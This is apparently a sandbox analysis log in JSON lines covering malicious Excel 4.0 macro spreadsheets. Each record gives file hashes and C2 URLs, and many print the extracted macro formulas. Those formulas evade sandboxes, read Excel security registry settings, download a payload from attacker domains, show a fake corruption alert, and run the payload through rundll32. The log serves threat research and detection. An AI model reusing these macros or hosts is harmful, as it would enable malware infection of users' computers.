ount":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"oCyL56UT98\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e4ca648c0f6ebb1bd993d0491d0c5e197e55c8081c81df4936753f61211ddd3"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1e4ca648c0f6ebb1bd993d0491d0c5e197e55c8081c81df4936753f61211ddd3","filesize":112128,"md5":"b5a6f35586559b513613dbc4ff616d11","sha1":"6a858d9636981902d2b0f37c533f98793d95af3a","sha256":"1e4ca648c0f6ebb1bd993d0491d0c5e197e55c8081c81df4936753f61211ddd3","sha512":"bf9d8a75dd626add2b9adfb2222512ade90870ae581354c1a0230952bf3830f23829b8d1b013949a66f8f8cfd21de4873b36cee1364d50604b3a07c3a63953b2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e4ca648c0f6ebb1bd993d0491d0c5e197e55c8081c81df4936753f61211ddd3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e50ee9e81814d9bae4e4bccf35984da5e1eac93053c9b30cc6a3b6adef5fa32"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1e50ee9e81814d9bae4e4bccf35984da5e1eac93053c9b30cc6a3b6adef5fa32","filesize":116224,"md5":"bb577ddc642732f86afa1535d6fb73d3","sha1":"0b0447599b911116a5f9abc613e8beae60774a63","sha256":"1e50ee9e81814d9bae4e4bccf35984da5e1eac93053c9b30cc6a3b6adef5fa32","sha512":"78ea2912edeb1ab0a31934939420cf40bb3e7bebcb95112ffbf11ac70ed5c67c97d1280ce9d54f58c81941afc9e635352a7da7e50232052c801c63d083f708ed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e50ee9e81814d9bae4e4bccf35984da5e1eac93053c9b30cc6a3b6adef5fa32.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"k5gkF1Tlvj\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e5905325ce01c81970440149efc95f4f0e58faf35703ffbdb0a7872f5154d63"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1e5905325ce01c81970440149efc95f4f0e58faf35703ffbdb0a7872f5154d63","filesize":112128,"md5":"9d511b108b21bea8a8cdff36b8289aa6","sha1":"5ce08e30f1eb525d33e7bea8b282bbae8e6a2ada","sha256":"1e5905325ce01c81970440149efc95f4f0e58faf35703ffbdb0a7872f5154d63","sha512":"b51feed1958f0fffbcd6e4401ae855e59098438a7e5ba570fee0f7b59ff785b5836426b5d01ba8172a0ef5ff5d9b5d1f7099663ddf03f73d20e98d840fa03e62","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e5905325ce01c81970440149efc95f4f0e58faf35703ffbdb0a7872f5154d63.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e69e9de95214a57f5de8aa4611219e66439a68824403b47a0794ae6ab303735"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1e69e9de95214a57f5de8aa4611219e66439a68824403b47a0794ae6ab303735","filesize":112128,"md5":"9356fec1b5342ab6ca2061fe57c7df00","sha1":"2fdbe80bf7ee213f2d0ff2407ccbe2c6327144ae","sha256":"1e69e9de95214a57f5de8aa4611219e66439a68824403b47a0794ae6ab303735","sha512":"4da2391bf11929f92ec079cff21b4cbbdff4534e2b78434c9412382d0d41a37bab83e7230d1673020a59478aea0e3ee8ac7074a3438c454ee19f4b2232a1c077","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e69e9de95214a57f5de8aa4611219e66439a68824403b47a0794ae6ab303735.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e81d7929422ea76254b3d9e5fa5fbb28789d3a1fe3837f158a54418cc81d554"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1e81d7929422ea76254b3d9e5fa5fbb28789d3a1fe3837f158a54418cc81d554","filesize":185344,"md5":"7b127c7d4701cf99c441c2e0db044edd","sha1":"ef074ea3cccb24a50f8a67a20d30f3f62a287443","sha256":"1e81d7929422ea76254b3d9e5fa5fbb28789d3a1fe3837f158a54418cc81d554","sha512":"553b840ae3fe1de15296882e5da56b8d0ae544df27b1f35623846fb4ee0e7d03ec82f1e7318b61e64abf91709885dfa06183676cf7757c10fa024bf8a877b600","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e81d7929422ea76254b3d9e5fa5fbb28789d3a1fe3837f158a54418cc81d554.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1e8ea69021a0376ebdaec0e4a43db5d8317c970c1345ade5873a2003304e8ff5"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1e8ea69021a0376ebdaec0e4a43db5d8317c970c1345ade5873a2003304e8ff5","filesize":168960,"md5":"02caea9637ed8865ddc1fbadd87260c5","sha1":"13ad134a52eaa97d603c5309c52dbdcc01a2a4c5","sha256":"1e8ea69021a0376ebdaec0e4a43db5d8317c970c1345ade5873a2003304e8ff5","sha512":"19839966ea51b22c7f290474742ab61142ca66bfe242258abe665b7b6216aba9175449c3484cacdcfb76c80a963e5d4f0a62ea5c0ef9bd80b3915c947e1d26ed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1e8ea69021a0376ebdaec0e4a43db5d8317c970c1345ade5873a2003304e8ff5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wDhF6Ggmft\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1ea67ce0b199b4aac455cb54eb9dbb292a7a24fe4f81621a4733972838ff2038"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1ea67ce0b199b4aac455cb54eb9dbb292a7a24fe4f81621a4733972838ff2038","filesize":168448,"md5":"7a70b6c113c307e14bf9ed09942fbd94","sha1":"efc81f4ae7cd60a414cf0970f2bdbac9750a70c8","sha256":"1ea67ce0b199b4aac455cb54eb9dbb292a7a24fe4f81621a4733972838ff2038","sha512":"32d3cbf635f01b9219326a5bf59493a1c2ace4ae77f74a5de19d5537f2c202911b7ba77652d13f7addf1fd611d51b55a0dc23d3415b55ef8d67be8817ef27586","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1ea67ce0b199b4aac455cb54eb9dbb292a7a24fe4f81621a4733972838ff2038.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lR4YQf3N4f\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1ecf507dc0a49cd73615cfc22cbc8ff62526b22de1168ce99f2657fe0dadb788"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1ecf507dc0a49cd73615cfc22cbc8ff62526b22de1168ce99f2657fe0dadb788","filesize":209920,"md5":"bc421fc8377d4f05a6f2c0c42335eba8","sha1":"7353bdf66495787195e7f657c9b4e46ce665e268","sha256":"1ecf507dc0a49cd73615cfc22cbc8ff62526b22de1168ce99f2657fe0dadb788","sha512":"998cf0275a28c161d2563b7b3d76b56abef28d68241082304147a63d15d219764885c9f1428a091a980a2b5d7e0515e9ff4732ae716cdf133ac7b476ff9ed8be","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1ecf507dc0a49cd73615cfc22cbc8ff62526b22de1168ce99f2657fe0dadb788.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TfD5aFMSWc\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1edc179ef569ff0df2ff734b1bcb95afdd5d5bd985d729d3841e455e33859114"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1edc179ef569ff0df2ff734b1bcb95afdd5d5bd985d729d3841e455e33859114","filesize":214528,"md5":"bc0a9faf9905ed6ebd3631c3149ca465","sha1":"7aa363ca79aa3d7b7f61da9312c9f00c62737d87","sha256":"1edc179ef569ff0df2ff734b1bcb95afdd5d5bd985d729d3841e455e33859114","sha512":"95a4e151494d771f5980a7edf5b6272941ed2517eeab61cc6c76937aef58bb406278827b7c0a505b02e0559ced50e7bd2e3dd44f5c0811b1dcefc0fc8723e7fb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1edc179ef569ff0df2ff734b1bcb95afdd5d5bd985d729d3841e455e33859114.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ef5MxC0RIp\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1eeb6ff8bf3acba2c39777561bd758f9be49e39e0eee9d59f3f3af55f2b9fdc3"},"analysis":{"reported":"2020-04-09T16:15:14Z","score":10},"files":[{"filename":"1eeb6ff8bf3acba2c39777561bd758f9be49e39e0eee9d59f3f3af55f2b9fdc3","filesize":185344,"md5":"d7b570a84297b6d89534788f82878d26","sha1":"5459c02925c9eaad12483887df88631974720547","sha256":"1eeb6ff8bf3acba2c39777561bd758f9be49e39e0eee9d59f3f3af55f2b9fdc3","sha512":"8a6b70797ded8df5a5fa19f88e5fa7f26a4910ec476aa77207783853fd29eae13358e74d2d8df14072e0009e32552291a948810d0a0a8ecb760886fc2993dd27","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1eeb6ff8bf3acba2c39777561bd758f9be49e39e0eee9d59f3f3af55f2b9fdc3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1ef17ba829b1ede3f513388e44de1789411ccc60c5a5d1b5b6bdf50a4f6a08bc"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1ef17ba829b1ede3f513388e44de1789411ccc60c5a5d1b5b6bdf50a4f6a08bc","filesize":112128,"md5":"fe8b9178b5166eddb298ca7b7ea7375a","sha1":"ea5ab8a1549be11d4d0e269d5076b9b5bce3f2e0","sha256":"1ef17ba829b1ede3f513388e44de1789411ccc60c5a5d1b5b6bdf50a4f6a08bc","sha512":"857880777f464424abe19976b32ab336f167df5b265c2d157d7b76d72d92fb490f20d084c00573d86a5f70ad568bbaf753699674162405a61a7c015b80498e57","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1ef17ba829b1ede3f513388e44de1789411ccc60c5a5d1b5b6bdf50a4f6a08bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f0dc87e3d7c2a8afdd13eed8937aca4a579229fddfe89e723b12eccd2d2fc49"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f0dc87e3d7c2a8afdd13eed8937aca4a579229fddfe89e723b12eccd2d2fc49","filesize":214528,"md5":"ee3de8dd8880b43ec0fac46b0e3e2c4d","sha1":"099c64902ebe884b736f8d4db0fb3d27ce75922d","sha256":"1f0dc87e3d7c2a8afdd13eed8937aca4a579229fddfe89e723b12eccd2d2fc49","sha512":"afa5aa3e927621697b66058444263375f8791e60e438bc9e74109435a290680473d3e066f3abde03dece463fbbbd47c87fa49fceb958662c51eace927c5234f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f0dc87e3d7c2a8afdd13eed8937aca4a579229fddfe89e723b12eccd2d2fc49.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jcUM2gu7AE\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f12e6d0c2fdbe503852a84445981f084825083b206b06a94c081fda2f3412d8"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f12e6d0c2fdbe503852a84445981f084825083b206b06a94c081fda2f3412d8","filesize":141312,"md5":"ce0a33d4fead933d2521843ac4e6ec67","sha1":"17494ac3e6cfe2c7f5b2212b4502ad46857b0b7b","sha256":"1f12e6d0c2fdbe503852a84445981f084825083b206b06a94c081fda2f3412d8","sha512":"ba76bb2bd7263a4108018d84ec0f55604a2e4c00ab411c30415a52c6980e5013a6409fc0e67c36560a433f40e8771514c74579d79c49b3ea0f7b52fa36fb8627","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f12e6d0c2fdbe503852a84445981f084825083b206b06a94c081fda2f3412d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"YY2nmYV8mn\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f2b68c66ea712f6c30e7028a94ee9b029636784b62c434a8f482df8c7d961bf"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f2b68c66ea712f6c30e7028a94ee9b029636784b62c434a8f482df8c7d961bf","filesize":206336,"md5":"d74ee49fe16f5fd46627c14d8617c8ad","sha1":"4a0573a057330264a768291072135de8055ed800","sha256":"1f2b68c66ea712f6c30e7028a94ee9b029636784b62c434a8f482df8c7d961bf","sha512":"ccbd2510b82a9f16313cbeb8f4a5d00a6aadbfa7c36b9c1ba98c83a92ea7535f18ec601f8d63cc96f7f388ce65c1a99ecc1ae151eb93596515a53f06ae315739","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f2b68c66ea712f6c30e7028a94ee9b029636784b62c434a8f482df8c7d961bf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FSB4AlqFHo\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f32254634267c48702032a2794ea0ec607eff28abac98f796f9371eb1e6f2a7"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f32254634267c48702032a2794ea0ec607eff28abac98f796f9371eb1e6f2a7","filesize":112128,"md5":"8cef2d9b949c0f501e3a8748887d0503","sha1":"9f9c3f27fe1c743825c0145806353bbe20486dc4","sha256":"1f32254634267c48702032a2794ea0ec607eff28abac98f796f9371eb1e6f2a7","sha512":"b8041c0d3465f71412a9f42aceafe2e2951ba51410b9d6273a3b9e12260e11431eb03eb0ad2719cdf868ea6cef9c90b9c80256c887d169c6b3bdf2beb366563c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f32254634267c48702032a2794ea0ec607eff28abac98f796f9371eb1e6f2a7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f3797274a472e50b072bd9337115ab5f7d8cfbc6bfede6cba34ad8c557a49f9"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f3797274a472e50b072bd9337115ab5f7d8cfbc6bfede6cba34ad8c557a49f9","filesize":112640,"md5":"ec95c212738cb9974b298a6b566eeffb","sha1":"c5f0b048ef98ffa2cc660786dd78a6028bd4536c","sha256":"1f3797274a472e50b072bd9337115ab5f7d8cfbc6bfede6cba34ad8c557a49f9","sha512":"d2b9c9849eade33b8489e651aefa47810f4de5ceb4ab9d58af4151d3ac6056a3e3a6ed03821386ead08b6ce40bc44fb6c95ee7b18c935ded773fc56616a2d2d6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f3797274a472e50b072bd9337115ab5f7d8cfbc6bfede6cba34ad8c557a49f9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
